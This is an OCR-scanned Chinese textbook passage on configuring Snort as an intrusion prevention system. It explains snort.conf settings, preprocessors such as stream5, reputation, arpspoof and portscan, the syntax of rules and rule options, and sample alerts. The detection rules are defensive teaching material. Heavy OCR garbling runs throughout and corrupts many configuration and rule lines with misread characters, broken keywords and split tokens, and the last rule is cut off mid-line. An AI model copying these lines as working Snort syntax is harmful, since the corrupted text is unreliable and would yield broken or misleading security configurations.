Jy Martin Raesch 8 The Snort Tean: http://vww.sno 
Copyright CC) 2814-2816 Cisco and/or its affiliats 


Copyright CC) 1998-2813 Sourcefire, Ine., et al. 
Using PORE 和 B09C6 DD2 Rek: Bx Vin: x2000 Teplen: 32 
Using ZLIB 6 > PB: 1460 NOP WE: 2 OP’ NOP we 





图 8-27 Snort 记录 器 模式 示例 


3. NIPS 模式 
NIPS 模式 只 需要 在 命令 下 使 用 -c 选项 指定 配置 文件 snort. conf 的 路 径 即 可 ， 
. conf 是 Snort 最 重要 的 配置 文件 ,包含 所 有 的 规则 集合 ,并 定义 输出 模式 和 报警 方式 等 。 





Snort 








snort 一 < 接口 名 > - 1 c:/snort/1og/ -cc:/snort/etc/snort. conf // 基 本 的 NIPS 模式 


Snort 作为 NIPS 的 配置 主要 通过 snort. conf 完成 , 它 主 要 包含 如 下 配置 步骤 : 

1) 设置 网 络 变量 

Snort 包含 三 种 变量 , 即 ipvar、portvar 和 var,ipvar 用 于 定义 网 络 地 址 或 地 址 范围 ， 
portvar 用 于 定义 端口 号 和 端口 范围 ,var 用 于 定义 通用 变量 ,这 些 变 量 会 在 规则 中 使 用 ， 
如 下 所 示 : 








ipvar HOME_NET 192.168.2.0/24 // 定 义 内 部 网 络 
ipvar EXTERNAL NET [192.168.1.0/24，202.101.192.0/23] // 定 义 外 部 网 络 
ipvar ANY_NET any // 定 义 任意 IP 网 络 


// 定 义 可 能 是 HTTP 服务 的 端口 集合 

portvar HTTP_PORTS [80,81, 311, 383, 591, 593, 901, 1220, 1414, 1741, 1830, 2301, 8080] 
portvar NOT_HTTP !80 // 定 义 不 是 80 的 端口 集合 
var WHITE_LIST_ PATH ../rules // 定 义 白 名 单列 表 目 录 


2) 配置 解码 器 
解码 器 用 于 协议 解码 ,是 Snort 的 第 一 个 处 理 模 块 ,分 析 报 文 各 个 层次 的 头 部 ,判定 
报 文 的 内 容 具 体 是 以 太 网 IP 报 文 .TCP 报 文 段 或 其 他 应 用 层 协议 等 ,并 把 处 理 结果 用 于 
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随后 的 预 处 理 模块 和 检测 引擎 。 它 主要 用 于 发 现 各 层次 协议 头 部 字段 存在 的 异常 和 错误 
信息 。 其 默认 配置 选项 如 下 : 


disable decode alerts // 对 解码 错误 不 产生 报警 
enable_decode_drops // 如 果 处 于 转发 模式 ,丢弃 产生 报警 的 报 文 
disable_tcpopt_experimental_ alerts// 如 果 报 文 存在 试验 性 质 的 TCP 选项 ,不 报警 
enable_tcpopt_experimental drops // 如 果 报 文 存在 试验 性 质 的 TCP 选项 ,丢弃 
disable tcpopt_obsolete alerts // 如 果 报 文 存在 废弃 的 TCP 选项 ,不 报警 
enable_tcpopt_obsolete_drops // 如 果 报 文 存在 废弃 的 TCP 选项 ,丢弃 


disable tcpopt ttcp alerts // 如 果 报 文 存在 T/TCP 选项 ,不 报警 
enable_ttcp_drops // 如 果 报 文 存在 T/TCP 选项 ,丢弃 
disable tcpopt alerts // 如 果 报 文 存在 TCP 选项 错误 ,不 报警 
enable_tcpopt_drops // 如 果 报 文 存在 TCP 选项 错误 ,丢弃 
disable ipopt alerts // 如 果 报 文 存在 IP 选项 错误 ,不 报警 
enable_ipopt_drops // 如 果 报 文 存在 IP 选项 错误 ,丢弃 


disable_decode_oversized_ alerts  // 如 果 报 文 存在 长 度 信息 错误 ,不 报警 

disable decode oversized drops // 如 果 报 文 存在 长 度 信 息 错误 ,不 丢弃 报 文 

// 执 行 各 个 层次 的 校 验 和 检查 , 值 可 以 是 none|noip|notcp|noudp|noicmp| ip|tcpludp|icmp 
checksum mode: all 

checksum_drop: none // 不 丢弃 任何 校 验 和 失败 的 报 文 

// 处 于 探测 模式 时 , 当 发 现 报警 时 ,尝试 从 etho 发 送 2 个 报 文 去 中 断 TCP 连接 或 发 送 ICMP 错误 消息 
response: eth0 attempts 2 

snaplen: 1500 // 设 置 默 认 捕 获 的 包 大 小 

logdir: c:/snort/log // 设 置 默认 的 日 志和 报警 路 径 


3) 检测 引擎 的 基本 配置 


config pcre_match limit: 3500 // 正 则 匹配 的 最 大 时 间 

config ppm: max— pkt — time 250 // 报 文 的 最 大 匹配 时 间 

config ppm: max 一 rule 一 time 200 // 规 则 的 最 大 处 理 时 间 

// 设 置 快速 匹配 的 算法 为 ac - split、 模 式 长 度 为 20 

config detection: search— method ac— split search— optimize max ~ pattern 一 len 20 

// 针 对 每 个 报 文 ,最 多 产生 8 个 事件 ,并 最 多 记录 3 个 ,产生 的 报警 排序 按照 规则 的 内 容 长 度 
config event_queue: max_queue 8 log 5 order_events content_length 


config paf_max: 16000 // 设 置 允许 汇总 的 最 大 协议 数据 单元 长 度 , 可 以 将 多 个 TCP 报 文 段 汇总 分 析 
4) 配置 动态 库 的 路 径 


dynamicpreprocessor directory c:/snort/1ib/snort_dynamicpreprocessor // 预 处 理 器 的 库 路 径 

dynamicengine c:/snort/lib/snort_dynamicengine/sf_engine. dll // 检 测 引擎 的 位 置 

dynamicdetection directory c:/snort/l1ib/snort_dynamicrules // 动 态 规则 库 的 位 置 

5) 配置 预 处理 参 数 

Snort 的 预 处 理 器 非常 多 ,限于 篇 幅 , 本 节 只 介绍 stream5、reputation、arpspoof、sf_ 
portscan 四 个 预 处 理 器 的 设置 方式 ,各 种 预 处 理 产 生 的 报警 示例 如 图 8-28 所 示 。 

(1) stream5 预 处 理 器 基于 通信 双方 的 IP 地 址 和 端口 ,跟踪 通信 会 话 , 支 持 TCP、 
UDP 和 ICMP 的 状态 跟踪 ,以 实现 有 状态 的 分 析 。 
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[ee] [136:1:1] (spp_reputation) packets blacklisted [#*] 
[Classification: Potentially Bad Traffic] [Priority: 2] 黑 名 单 报警 
06/24-09:51:20. 549532 74:E5:0B:73:38:80 -> 9C:21:6A:E4:79:8A type:0x800 len:0x36 
192. 168. 2. 201 :50534 -> 202.101.194.153:80 TCP TIL:128 TOS:0x0 ID:28095 IpLen:20 DgmLen:40 DF 
+ 让 +A+++F Seq: Ox6EA5417E Ack: Ox92346A81 Win: Ox8F72 TcpLen: 20 


[##] [112:1:1] (spp_arpspoof) Unicast ARP request [##+] 
06/24-10:49:40. 925507 ARP 其 骗 报 警 


[##] [129:20:1] TCP session without 3-way handshake [##] 
[Classification: Potentially Bad Traffic] [Priority: 2] TCP 会 话 异常 报警 | 
06/24-10:51:18. 831260 74:E5:0B:73:38:80 -》9C:21:6A:E4:79:8A type:0x800 len:0x5A 

192, 168. 2. 201:61138 -》115. 239. 210. 246:5287 TCP TTL:128 TOS:0x0 ID:4859 IpLen:20 DenLen:76 DH 
+++AP+++ Seq: Ox595F8A38 Ack: OxCFAOIE2F Win: Oxl05C TcpLen: 20 


[hk] [122:5:1] (portscan) TCP Filtered Portscan [tt] 要 

[classification: Attempted Information Leak] fpriority: 2] ”交口 扫 擅 报 加 
06/24-11:03:03. 022780 DO:53:49:06:15:1D -> 74:E5:0B:73:38:80 type:0x800 len:0xB4 
192.168. 2.103 -》192.168. 2. 201 PROTO:255 TTL:128 TOS:0x0 ID:15601 IpLen:20 DenLen:166 DF 





图 8-28 ”Snort 的 预 处 理 器 报警 示例 


Ppreprocessor stream5 global: 


track_tcp yes, // 追 踪 TCP 

track_udp yes, // 追 踪 UDP 

track_icmp no, // 不 追踪 ICMP 

max_tcp 262144, //TCP 会 话 的 最 大 报 文 数量 

max_udp 131072, //UDP 会 话 的 最 大 报 文 数量 

max_active_responses 2, // 最 多 发 送 两 个 主动 防御 报 文 

min_response_seconds 5 // 最 小 响应 时 间 是 5s 
Preprocessor stream5_tcp: 

log_asymmetric traffic no, // 不 记录 非 对 称 的 报 文通 信 

policy windows, // 指 明 是 针对 Windows 系统 的 策略 

detect anomalies, // 检 测 TCP 协议 报 文 的 异常 


// 只 有 三 路 握手 完成 , 才 认 为 建立 一 个 会 话 ,180 指 如 果 有 的 会 话 在 Snort 运行 之 前 就 存在 
//snort 认为 如 果 在 180 秒 内 有 该 连接 的 报 文 出 现 ,那么 该 连接 已 经 建立 
require_3whs 180, 


‘overlap_limit 10, //TCP 报 文 段 的 序号 有 重合 的 情况 ,不 能 出 现 10 次 
small_segments 3 bytes 150, // 小 于 150 字 节 的 报 文 段 被 认定 为 小 报 文 段 , 如 果 出 现 3 
// 个 小 报 文 段 则 报警 
timeout 180, // 对 于 一 个 会 话 至 多 只 跟踪 180s 
ports server 21 22 23 // 只 对 服务 端 为 指定 端口 的 报 文 进行 跟踪 
preprocessor stream5_ udp: 
timeout 180 // 对 于 一 个 会 话 至 多 只 跟踪 180s 


(2) reputation 预 处 理 器 对 出 现在 黑 名 单 和 白 名 单 上 的 IP 地 址 和 网 段 进 行 报警 。 


Ppreprocessor reputation: 


memcap 500, // 为 预 处 理 器 至 多 分 配 500M 内 存 
priority whitelist, // 如 果 IP 同时 出 现在 黑 / 白 名 单 上 , 白 名 单 优先 
nested_ip inner, // 如 果 报 文 是 隧道 报 文 ,那么 处 理 隧道 内 部 的 IP 


whitelist $ WHITE LIST_PATH/white_list.rules,， // 白 名 单 路 径 
blacklist $ BLACK_LIST_PATH/black_list.rules // 黑 名 单 路 径 


(3) arpspoof 预 处 理 器 识别 ARP 攻击 ,主要 跟踪 不 同 的 ARP 请 求 和 应 答 内 容 。 


preprocessor arpspoof: — unicast // 如 果 出 现 单 播 ARP 请 求 , 则 报警 
// 预 先 绑 定 的 IP 和 MAC 映射 ,如 果 发 现 ARP 报 文中 出 现 不 一 致 的 内 容 , 则 报警 
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preprocessor arpspoof detect host: 192.168.40.1 f0:0f:00:f0:0f:00 
(4) sf_portscan 预 处 理 器 可 以 识别 各 种 端口 扫描 , 它 基 于 stream5 预 处 理 器 。 


Preprocessor sfportscan: 


proto { all } // 检 测 所 有 的 TCP/UDP/ICMP/IP 扫描 

memcap { 10000000 } // 预 处 理 的 内 存 大 小 

scan _ type { all } //portscan/portsweep/decoy_portscan/distributed portscan/all 
sense_level { high } // 精 确 度 设置 low/medium/high 


6) 配置 输出 插件 
默认 是 输出 文本 报警 至 "alert ids" 文 件 ,还 可 以 输出 至 数据 库 (需要 进一步 翻阅 参考 
手册 ) 。 
// 推 荐 设置 为 unified2 格式 ,可 以 与 其 他 安全 组 件 交 换 信息 


output unified2: filename merged. log, limit 128, nostamp, mpls event types, vlan event types 
output alert unified2: filename snort.alert, limit 128, nostamp 





output log_unified2: filename snort. log, limit 128, nostamp 
output alert_syslog: LOG_AUTH LOG_ALERT // 设 置 输出 为 syslog 格式 
output 1og_tcpdump: tcpdump. 1og // 设 置 输出 为 tcpdump 格式 


7) 定制 规则 集 
设置 检测 规则 文件 ,解码 器 规则 文件 、 预 处 理 器 和 动态 库 的 规则 文件 ,Snort 的 规则 
都 是 文本 形式 。 


// 检 测 引擎 规则 集合 

include $ RULE PATH/local. rules 

include $ RULE PATH/app— detect. rules 

include $ RULE_PATH/attack— responses. rules 
include $ RULE PATH/backdoor. rules 

// 预 处 理 器 规则 和 解码 器 规则 

include $ PREPROC_RULE_PATH/preprocessor. rules 
include $ PREPROC RULE PATH/decoder. rules 
include $ PREPROC_RULE_PATH/sensitive— data. rules 
// 动 态 库 规则 

include $ SO_RULE PATH/bad - traffic. rules 
include $ SO_RULE_ PATH/chat. rules 


Snort 的 规则 主要 由 两 部 分 组 成 , 即 规则 头 部 和 规则 选项 。 规 则 头 部 在 括号 外 面 , 规 
则 选项 在 括号 里 面 。 以 下 列 出 了 两 条 示例 规则 ,涵盖 了 Snort 规则 定义 的 大 部 分 选项 ， 


alert tcp $HOME_NET any — > $EXTERNAL_NET $HTIP_ PORTS (msg:" test msg"; flow: 
established, to_server; content:"|3A 3A|test|00|"; content:"GET"; nocase; http_method; 
content:"/Setup "; nocase; http_url; pcre:"/\/Setup \d$ \. exe $ /i"; reference:url, www. 
test. org/test. html; classtype:trojan— activity; sid: 2010001; rev:3) 

alert tcp $ HOME any —>192.168.2.101 21 (msg:"suspicious ftp login"; content:"sanders"; 
dsize:< 70; offset: 5; depth: 7; content:" | 00 0a|"; distance: 0; within: 30; reference: 
bugtraq，2540; classtype: policy violation; sid:2010002; rev:2) 
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规则 头 部 包含 规则 的 动作 、 协 议 、 源 和 目标 IP 地 址 与 网 络 掩 码 、 以 及 源 和 目标 端口 信 
息 , 而 规则 选项 指定 报警 消息 内 容 和 检测 报 文 的 具体 信息 。 规 则 选项 中 冒号 前 面 的 单词 
称 为 选项 关键 字 , 如 “content”“msg” 等 。 规 则 选项 中 的 所 有 选项 放 在 一 起 时 ,各 个 选项 是 
逻辑 “与 ”的 关系 , 即 所 有 选项 要 同时 满足 才 匹 配 。 上 面 两 条 规则 中 出 现 的 变量 $ HOME_ 
NET、$ EXTERNAL_NET 和 $ HTTP_PORTS 都 需要 在 snort. conf 配置 文件 中 预先 
配置 。 
1) 规则 头 部 
(1) 规则 动作 。 规 则 动作 定义 了 当 满 足 规则 定义 的 所 有 属性 的 报 文 出 现时 要 采取 的 
行动 ,规则 的 第 一 项 就 是 规则 动作 。 主 要 有 三 种 动作 : Dalert: 使 用 选择 的 报警 方法 生 
成 警报 ,并 记录 该 报 文 ; @log: 仅 记录 该 报 文 ,但 是 不 报警 ; @pass: 丢弃 或 忽略 该 报 文 。 
用 户 也 可 以 自 定义 动作 类 型 ,使 用 ruletype 关键 字 。 下 面 这 个 例子 创建 一 条 自 定义 
动作 类 型 ,将 匹配 的 报 文 和 报警 分 别 记 录 到 系统 日 志和 MySQL 数据 库 : 
ruletype redalert{ 
type alert output 
alert_syslog: LOG AUTH LOG ALERT 
output database: log, mysql, user = Snort dbname = snort host = localhost 
} 
(2) 协议 。Snort 当前 分 析 可 疑 报 文 的 协议 有 4 种: TCP、UDP、IMCP 和 IP。 将 来 
可 能 会 有 更 多 ,例如 ARP 等 。 
(3) 源 和 目标 IP 地 址 。 关 键 字 “any” 可 以 被 用 来 定义 任何 地 址 ,IP 地 址 由 数字 型 IP 
地 址 和 一 个 CIDR 块 组 成 。 可 以 使 用 感叹 号 1” 表示 否 定 运 算 符 , 即 除 某 类 IP 地 址 之 外 
的 其 他 所 有 IP 地 址 。 还 可 以 指定 IP 地 址 列表 , 放 在 符号 中 ,并 使 用 逗号 分 开 , 如 下 所 示 : 


alert tcp ![192.168.1.0/24,10.1.1.0/24] any -> [192.168.1.0/24,10.1.1.0/24] 111 


(4) 源 和 目标 端口 号 。 端 口号 可 以 用 几 种 方法 表示 ,包括 “any” 端 口 、 多 个 端口 .单个 
端口 端口 范围 和 否定 操作 符 "!1” 等 。“any” 表 示 任 何 端口 ,单个 数字 表示 具体 端口 ,如 80 
表示 HTTP, 端 口 范围 用 范围 操作 符 “:”, 多 个 端口 使 用 符号 “[]” 包 含 ( 端 口 数字 和 中 括 
号 之 间 不 能 有 空格 ) ,并 用 逗号 隔 开 ,如 下 所 示 : 

1log udp any any -> 192.168.1.0/24 1:1024 记录 目标 端口 范围 在 1 一 1024 的 UDP 报 文 

1og tcp any any -> 192.168.1.0/24:6000 记录 来 自任 何 端口 ,目标 端口 小 于 等 于 6000 的 TCP 报 文 

log tcp any :1024 -> 192.168.1.0/24:500: 记录 来 自任 何 端口 ,目标 端口 大 于 等 于 500 的 TCP 报 文 

log tcp any any -> 192.168.1.0/24 !6000:6010 记录 目标 端口 范围 不 在 6000 一 6010 间 的 所 有 TCP 报 文 

1og tcp any any -> 192.168.1.0/24 [21,22,135] 记录 目标 端口 为 21 或 22 或 135 的 TCP 报 文 

(5) 流量 方向 。 方 向 操作 符 “->” 表 示 规 则 所 匹配 的 报 文 方向 。 操 作 符 左边 的 地 址 和 
端口 号 是 源 主机 ,右边 是 目标 主机 。 双 向 操作 符 “<>” 告 诉 Snort 把 地 址 /端口 号 对 既 作为 
源 又 作为 目标 ,这 对 于 记录 和 分 析 双 向 对 话 十 分 方便 ,如 Telnet 会 话 ,用 来 记录 一 个 
Telnet 会 话 的 示例 如 下 : 


1og !192.168.1.0/24 any <> 192.168.1.0/24 23 
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2) 规则 选项 
规则 选项 组 成 了 检测 引擎 的 核心 ,各 个 规则 选项 之 间 用 分 号 隔 开 。 规 则 选项 的 关键 
字 和 参数 之 间 用 冒号 分 开 ,常见 规则 选项 关键 字 如 表 8-4 所 列 。 


表 8-4 常见 规则 选项 



































msg -在 报警 和 日 志 中 打印 一 个 消息 resp -主动 防御 ,复位 连接 或 发 送 ICMP 错误 
ttl -检查 IP 头 部 的 TTL 值 pcre -使 用 perl 兼容 的 正则 表达 式 匹配 内 容 
dsize -检查 报 文 的 净 荷 尺寸 regex -使 用 标准 的 正则 表达 式 匹配 
flags -检查 TCP flags 值 distance -设置 模式 匹配 所 跳 过 的 距离 
ack -检查 TCP 应 答 (acknowledgement) 的 序号 值 | within- 限 制 模式 匹配 所 在 的 范围 
content -在 报 文 的 净 荷 中 搜索 指定 的 模式 fragbits -检测 报 文 的 分 片 有 关 标 记 
RE flow -检测 流 的 方向 和 状态 
depth - content 选项 的 修饰 符 , 设 定 搜索 的 最 大 | http_method -设置 内 容 检 测 的 位 置 是 HTTP 
深度 方法 
nocase -指定 对 content 字符 串 大 小 写 不 敏感 http_header -设置 内 容 检 测 的 位 置 是 HTTP 头 部 
fast_pattern -设置 模式 内 容 的 快速 匹配 http_uri -设置 内 容 检测 的 位 置 是 URI 部 分 

»。 msg 


通知 记录 和 报警 引擎 ,在 记录 或 报警 的 同时 必须 打印 的 消息 ,只 是 一 个 简单 的 文本 字 
符 串 ,需要 用 双 引 号 包含 ,如 “msg:"this is an alert"”。 

。， ttl 

用 于 检测 IP 头 部 的 TTL 值 ,可 以 匹配 大 于 或 小 于 某 个 范围 ,或 者 精确 匹配 某 个 数 
字 ,该 选项 关键 字 可 以 用 于 检测 traceroute 命令 的 执行 ,如 *ttl:64; ttl:> 64; ttl:< 64;”。 

* dsize 

用 于 检测 报 文 的 数据 部 分 大 小 ,与 ttl 选项 类 似 , 可 以 设置 成 任意 值 ,也 可 以 使 用 “>” 
或 “<” 指 定 范围 , 它 在 检查 缓冲 区 溢出 时 比 单纯 检测 数据 内 容 的 方法 要 快 很 多 。 


dsize:<70; dsize:80; dsize:> 100; 


。 flags 

检测 TCP 标记 项 ,共有 9 个 标志 变量 , 即 FIN(F)、SYN(S)、RST(R)、PSH(P)、 
ACK(A) 、`URG(U) 、Reserved bit 2(2)、Reserved bit 1(1) .No TCP Flags Set(0) ,其 中 保 
留 位 可 以 用 来 检测 异常 行为 ,例如 IP 栈 指 纹 攻 击 。 在 这 些 标志 之 间 还 可 以 使 用 逻辑 操作 
符 ,“ 十 ”匹配 所 有 的 指定 标志 外 加 一 个 标志 ,“ * ”匹配 指定 的 任何 一 个 标志 ,“!” 指 定 标志 
位 没有 设置 。 命 令 格 式 和 具体 示例 如 下 : 














格式 flags: test_bits[，mask_bits] //test_bits 指 待 检测 标记 ,mask_bits 指 不 需要 考虑 的 标记 
flags:SF, R12 // 检 测 S 和 了 标记 是 否 设置 ,不 考虑 保留 位 1 和 2 
flags:SF x // 检 测 S 或 了 标记 是 否 设置 

flags:!S!IF* ,RA12 //S 和 了 标记 有 一 个 没 设置 即 可 ,同时 忽略 RA12 四 个 标记 
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。， ack 
用 于 匹配 TCP 报 文 的 ACK 确认 号 ,设置 方法 与 dsize、\ttl 选项 相同 。 
。 content 


检查 数据 内 容 是 否 匹 配 指定 模式 , 它 可 以 结合 文本 表示 和 十 六 进 制 表 示 的 二 进 制 数 
据 进 行 匹配 。 可 以 在 一 条 规则 中 匹配 多 个 content 选项 ,可 以 使 用 感叹 号 表示 否定 匹配 。 
十 六 进 制 表示 使 用 "| "包含 ,并 且 每 个 字 节 之 间 要 用 空格 隔 开 。 存 在 多 种 模式 时 ,默认 情 
况 下 ,各 个 模式 之 间 不 存在 顺序 关系 ,模式 匹配 区 分 大 小 写字 母 , 所 有 的 模式 数据 需要 用 
双 引 号 包含 。content 示例 如 下 : 


content:"USER" ; content:"|FF D0|"; content:"USER|3A 3A|else|00 00|"; 


» offset 

content 规则 选项 修饰 符 ,指定 模式 匹配 函数 从 报 文 的 数据 部 分 开始 搜索 的 偏 移 量 ， 
它 必 须 和 content 规则 选项 一 起 使 用 , 偏 移 量 从 0 开始 计数 ,以 下 规则 表示 从 第 6 字 节 数 
据 开 始 匹配 : 

alert tcp $ HOME any 一 > 192.168.2.101 21 (msg:"suspicious ftp login"; content:"sanders"; 

dsize:<70; offset:5; depth:7;) 

»。 depth 

content 规则 选项 修饰 符 , 它 设置 内 容 模式 匹配 函数 从 搜索 区 域 的 起 始 位 置 开始 搜 
索 , 所 能 搜索 的 最 大 长 度 , 即 限制 搜索 的 区 域 范 围 。 如 果 设 置 了 offset 选项 , 则 搜索 区 域 
从 offset 开始 ,否则 从 数据 部 分 的 起 始 位 置 开 始 。 上 面 规则 中 的 depth:7 表示 只 搜索 第 6 
个 字 节 后 的 7 个 字 节 是 否 与 字符 串 “sanders” 匹 配 , 将 offset 与 depth 结合 ,可 以 实现 精确 
定位 的 匹配 。 

。 nocase 


content 规则 选项 修饰 符 ,指明 内 容 匹 配 不 区 分 大 小 写 ,默认 内 容 匹 配 区 分 大 小 写 。 


alert tcp $ HOME any 一 > 192.168.2. 101 21 (msg:"suspicious ftp login"; content:"sanders"; 
nocase; ) 


» fast_pattern 

content 规则 选项 修饰 符 , 即 如 果 该 项 content 不 匹配 , 则 不 需要 继续 匹配 其 他 
content 模式 ,所 以 速度 较 快 。 示 例如 下 : 

// 优 先 匹配 "sanders", 如 果 不 匹配 , 则 无 须 匹配 另外 一 个 模式 "hello" 


alert tcp $ HOME any 一 > 192.168.2.101 21 (msg:"suspicious ftp login"; content:"sanders"; 
fast_pattern; content:"hello"; sid:3000001;rev:1) 


。 resp 

IPS 防御 选项 ,对 于 TCP 端口 Snort 可 以 使 用 复位 TCP 连接 完成 ,对 于 UDP 端口 可 
以 使 用 4 种 ICMP 错误 消息 。 该 选项 特别 适合 于 Snort 部 署 在 探测 模式 时 ,终止 攻击 者 
的 入侵 行为 。Snort. conf 配置 文件 中 ,可 以 配置 该 选项 的 尝试 次 数 , 示 例如 下 : 


config resp: attempts 1 // 只 尝试 1 次 ,可 以 设置 多 次 
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该 选项 支持 的 值 为 : 


rst_snd | rst_rcv | rst all | reset_source | reset_dest | reset_both 
| icmp_net | icmp host | icmp port | icmp all 


示例 规则 如 下 所 示 , 相 应 和 人 侵 阻止 过 程 的 报 文 序列 如 图 8-29 所 示 。 


alert tcp any any — > 192. 168. 2. 103/32 [135, 445] (msg:"test 1"; resp:reset_source; sid: 
3000001;rev:1;) 
alert udp any any - > 192. 168. 2. 103/32 136 (msg:"test 4"; resp: icmp_net; sid:3000005; 


rev:1;) 


ICMP net 不 可 达 





图 8-29 Snort 入侵 响应 示例 


对 应 的 两 条 报警 示例 如 下 所 示 : 


[*x ] [1:3000001:1] test 1 [**] 

[Priority: 0] 

06/25 - 20:28:52.981953 192.168.2.201:49809 -> 192.168.2.103:135 
TCP TTL:128 TOS:0x0 ID:17805 IpLen:20 DgmLen:40 DF 

闪闪 Axxx# Seq: OxC35185F1 Ack: 0x7D501572 Win: 0x100 TcpLen: 20 
[x#x] [1:3000005:1] test 4 [*x] 

[Priority: 0] 

06/25 - 20:28:31.366539 192.168.2.201:52263 -> 192.168.2.103:136 
UDP TTL:128 TOS:0x0 ID:17789 IpLen:20 DgmLen:32 

Len: 4 


。 pcre 

使 用 perl 兼容 的 正则 表达 式 匹 配 数据 内 容 。 

alert tcp $ HOME any —>192.168.2.101 21 (msg:"suspsicious web content"; pcre:"/\/Setup \d 
\.exe $ /i"; sid:3000001; rev:1;) 

» Pgen 

使 用 标准 正则 表达 式 匹 配 数据 内 容 , 与 pcre 类 似 ,只 是 采用 的 正则 表达 式 语法 不 同 。 
» distance 


content 规则 选项 修饰 词 ,确保 在 使 用 content 模式 匹配 时 ,不 同 的 模式 之 间 至 少 距 


离 distance 个 字 节 ,也 可 以 用 来 对 不 同 模式 排序 。 默 认 情 况 下 .不 同 的 content 匹配 是 没 
有 先后 顺序 的 。 以 下 示例 说 明 第 二 个 模式 “EFGH” 必 须 在 匹配 模式 “ABCDE” 的 1 个 字 


节 后 ,才能 开始 进行 。 


alert tcp any any 一 > any any (content: "2 Patterns"; content: "ABCDE"; offset:1; content: 


"EFGH"; distance:1; within:20;) 
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»。 within 

content 规则 选项 修饰 词 ,确保 在 使 用 content 时 模式 匹配 时 ,不 同 模式 之 间 至 多 中 
离 within 个 字 节 ,必须 与 distance 选项 联合 使 用 。 上 面 的 例子 限制 了 模式 “EFGH” 与 第 
一 个 模式 距离 之 间 不 能 超过 20 字 节 。 

。 fragbits 

检测 IP 分 片 和 保留 位 字段 ,共有 3 个 位 能 被 检测 , 即 保留 位 (R)、 更 多 分 片 位 
MF(M) 和 不 分 片 位 DF(D) ,可 以 结合 在 一 起 检测 。 可 以 使 用 修饰 符号 对 特定 的 位 进行 
逻辑 组 合 :“ 十 ”表示 匹配 所 有 的 指定 标记 外 还 要 匹配 任意 一 个 标记 ,“ * ”表示 任何 位 为 
真 ,“!1” 指 定位 为 假 。 


fragbits:RMF + ; fragbits:RM* ; fragbits:RM! + ; flags:R; 


»。 flow 

必须 与 stream5 预 处 理 器 联合 使 用 ,允许 规则 只 应 用 到 流 的 某 个 具体 方向 ,从 而 允许 规 
则 只 应 用 到 客户 端 或 者 服务 器 ,选项 值 包括 : to_client,from_server 匹配 服务 器 到 客户 端 
的 响应 ; @to_server,from_client 匹配 客户 端 到 服务 器 的 请 求 ; @established 只 匹配 已 经 建 
立 的 TCP 连接; @stateless 不 管 流 处 理 器 当前 处 于 什么 状态 都 匹配 ; @no_stream 不 在 预 处 
理 重建 的 流 报 文 上 匹配 ; @only_stream 只 在 预 处 理 器 重建 的 流 报 文 上 匹配 。 

具体 选项 格式 和 示例 如 下 : 

flow: [to_client|to_server|from_client|from_server 

|established| stateless|no_stream| only_stream] 


alert tcp ! $ HOME NET any 一 > $ HOME NET 0 (msg: "Port 0 TCP traffic"; 
flow: from client, stateless;) 





。 http_method,http_header, http_uri 

content 选项 修饰 符 , 允 许 只 在 一 个 HTTP 请 求 头 部 的 方法 部 分 .HTTP 报 文 的 头 部 
和 HTTP 请 求 的 URI 部 分 进行 搜索 匹配 ,用 法 如 下 所 示 : 

alert tcp $ HOME any — > 192. 168. 2. 101 80 (msg:" suspicious web request"; content:"get"; 


nocase; http_method; content:" www. jxnu. edu. cn"; nocase; http_ uri; content:" passwd = fguo"; 
nocase; http_header; ) 


除 上 述 规 则 选项 之 外 ,还 有 一 类 规则 选项 称 为 事件 信息 选项 ,用 于 提供 规则 的 上 下 文 
信息 ,如 表 8-5 所 列 。 
表 8-5 事件 信息 选项 的 配置 文件 列表 























classification. config 规则 所 属 的 各 个 类 别 定义 

file_magic. conf 识别 每 种 文件 类 型 的 魔术 字 (magic number) 定 义 
gen_msg. map 定义 生成 规则 的 组 件 ID, 包 括 各 类 预 处 理 器 ,检测 引擎 
reference. config 所 有 引用 源 的 定义 

sid_msg. map 预定 义 规则 的 SID 和 引用 源 (reference) 

threshold. conf 用 于 调节 报警 输出 阔 值 的 定义 

unicode. map 用 于 unicode 映射 的 定义 
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1) 特征 标识 符 SID 

该 选项 用 于 唯一 性 地 标识 规则 ,每 个 规则 的 SID 不 能 重复 ,而 且 只 能 是 数字 ,数字 的 
划分 定义 如 下 : 

。 0 一 1000000: Snort 开发 团队 保留 使 用 ; 

。 2000001 一 2999999: 用 于 定义 新 出 现 的 威胁 ; 

。 3000000 十 : 公用 和 用 户 自 定义 。 

sid-msg. map 中 存储 当前 Snort 开发 团队 预定 义 规 则 的 SID 和 引用 源 (reference)。 

2) 修订 rev 

表示 规则 的 版 本 号 , 当 创建 一 条 新 规则 时 ,设置 为 rev:1, 然 后 每 次 修改 后 ,可 以 将 
rev 数量 加 1,Snort 如 果 遇 到 SID 相同 的 两 条 规则 ,会 自动 使 用 高 版 本 号 的 规则 。 

3) 引用 reference 

用 于 链接 外 部 信息 源 ,reference. config 文件 列 出 了 所 有 的 信息 源 ( 图 8-30) ,在 规则 
中 使 用 reference 有 两 种 方式 ,一 是 直接 把 外 部 链接 的 URL 完整 写 和 规则 ,二 是 写 入 相对 
URL, 并 指定 reference. config 中 的 具体 信息 源 前 级 ,组 合成 为 实际 URL。 第 二 种 方法 相 
对 更 加 简洁 和 灵活 ,如 下 所 示 : 

alert tcp any any 一 > $ EXTERNAL NET $ HTTP_PORTS (msg:"test 1"; content:"test"; reference: 

url, www. securityfocus. com/bid/2490; rev:1;) 


alert tcp any any 一 > $ EXTERNAL NET $ HTTP_PORTS (msg:"test 1"; content:"test"; reference: 
bugtraq, 2490; rev:1;) 








config reference: bugtraq http://wew.securityfocus. con/bid/ 

config reference: cve http://cve. nitre. org/cgi-bin/cvenane. cgi? 
nane= 

config reference: arachNIDS http://www. whitehats. con/info/IDS 

config reference: osvdb ~ http://osvdb.org/show/osvdb/ 


# Note, this one needs a suffix as well.... lets add that in a bit. 
config reference: McAfee http://vil.nai.con/vil/content/v_ 
config reference: nessus 。 http://cgi.nessus. org/plugins/dunp. php32id-| 





config reference: url http:// 
config reference: nsb http://technet. nicrosoft. con/en— 
us/security/bulletin/ 





图 8-30 ”reference. config 配置 文件 示例 


4) 优先 级 priority 

手动 指定 规则 的 优先 级 ,通常 只 使 用 1 一 10 的 数 ,1 表示 最 高 优先 级 ,10 表示 最 低 优 
先 级 。 如 果 规 则 定义 了 所 属 类 别 ,那么 默认 使 用 该 类 别 的 优先 级 ,但 是 可 以 手动 明确 指定 
自 定义 的 优先 级 。 以 下 示例 就 将 规则 的 优先 级 明确 指定 为 1, 而 不 是 使 用 bad-unknown 
类 别 的 默认 优先 级 : 

alert tcp any any 一 > $EXTERNAL_NET 80 (msg:" test 1"; content:" test"; priority: 1; 

